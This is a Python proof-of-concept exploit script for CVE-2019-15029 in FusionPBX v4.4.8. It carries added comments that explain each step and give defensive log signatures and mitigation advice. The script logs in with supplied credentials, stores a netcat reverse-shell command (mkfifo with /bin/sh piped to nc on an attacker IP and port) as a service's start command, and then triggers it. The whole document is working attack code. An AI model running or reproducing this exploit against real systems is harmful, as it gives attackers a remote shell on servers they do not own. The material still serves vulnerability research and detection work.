POC / FusionPBX-exploit.py PY
#!/usr/bin/python3
 
'''
# Exploit Title: FusionPBX v4.4.8 authenticated Remote Code Execution
# Date: 13/08/2019
# Exploit Author: Askar (@mohammadaskar2)
# CVE : 2019-15029
# Vendor Homepage: https://www.fusionpbx.com
# Software link: https://www.fusionpbx.com/download
# Version: v4.4.8
# Tested on: Ubuntu 18.04 / PHP 7.2
'''
 
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import sys
import warnings
from bs4 import BeautifulSoup
 
# Silence bs4 UserWarnings and urllib3's InsecureRequestWarning. The second
# warning would otherwise be emitted by the requests in this script, which all
# pass verify=False (the server's TLS certificate is not validated).
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 
# Exactly five positional arguments are required (argv[0] plus five == 6).
# Otherwise the script prints the argument count it received, then the usage
# text, and stops.
if len(sys.argv) != 6:
    print(len(sys.argv))
    print("[~] Usage : ./FusionPBX-exploit.py url username password ip port")
    print("[~] ./exploit.py http://example.com admin p@$$word 172.0.1.3 1337")
 
    exit()
 
# Positional arguments, in the order given by the usage text above.
url = sys.argv[1]       # base URL; endpoint paths are appended to it below
username = sys.argv[2]  # account used for the login POST
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]
 
 
# A single Session is reused for every request, so any cookies set by the
# login response are sent with the later requests.
request = requests.session()
 
# Form fields submitted as the body of the login POST.
login_info = {
    "username": username,
    "password": password
}
 
# Log in by posting the credentials to the dashboard page.
# verify=False: the TLS certificate is not checked for this request.
login_request = request.post(
    url+"/core/user_settings/user_dashboard.php",
     login_info, verify=False
 )
 
 
# Success is inferred only from the absence of this error string in the
# response body; the HTTP status code is not inspected.
# NOTE(review): the else branch only prints a message -- the script carries on
# with the remaining requests even when the credentials were rejected.
if "Invalid Username and/or Password" not in login_request.text:
    print("[+] Logged in successfully")
else:
    print("[+] Error with creds")
 
# Endpoints of the FusionPBX "services" app used below: the edit form that
# saves a service record, and the listing page.
service_edit_page = url + "/app/services/service_edit.php"
services_page = url + "/app/services/services.php"

# Form fields posted to service_edit.php to create a new service record.
payload_info = {
    # Name of the service record to create; also used further down to find the
    # record again in the listing page.
    "service_name":"PwnedService3",
    "service_type":"pid",
    "service_data":"1",
 
    # Start command saved with the service record. Per the advisory in the
    # file header (CVE-2019-15029) this is the field through which an
    # authenticated user gets a command run on the server. The literal below
    # is the PoC author's sample value.
    # Defensive note: a stored start/stop command containing shell
    # metacharacters (; | >) or references to /bin/sh, nc or FIFOs under /tmp
    # is worth alerting on when auditing existing service records.
    "service_cmd_start":"rm /tmp/z;mkfifo /tmp/z;cat /tmp/z|/bin/sh -i 2>&1|nc 172.0.1.3 1337 >/tmp/z",
    "service_cmd_stop":"stop",
    "service_description":"desc",
    "submit":"Save"
}
 
# Save the service record (the response is not checked), then fetch the
# listing page so the new record's id can be read from it.
request.post(service_edit_page, payload_info, verify=False)
html_page = request.get(services_page, verify=False)
 
# Parse the listing with the lxml parser.
soup = BeautifulSoup(html_page.text, "lxml")
 
# Walk every element that carries an href and stop at the first one whose
# child nodes include the service name.
for a in soup.find_all(href=True):
    if "PwnedService3" in a:
        # Take the text after the first "=" in the link as the service id.
        # presumably the href has the form ...?id=<id> -- TODO confirm
        sid = a["href"].split("=")[1]
        break
 
# Request the listing page with a=start for that id. Presumably this is the
# point where the server runs the stored start command (inferred from the
# advisory title and the message printed below).
# Defensive note: in web access logs this shows up as a POST to
# /app/services/service_edit.php followed by a GET to
# /app/services/services.php?id=<id>&a=start within the same session.
# Mitigation is to run a release that fixes CVE-2019-15029 and to restrict
# which accounts may use the services app.
service_page = url + "/app/services/services.php?id=" + sid + "&a=start"
print("[+] Triggering the exploit , check your netcat !")
request.get(service_page, verify=False)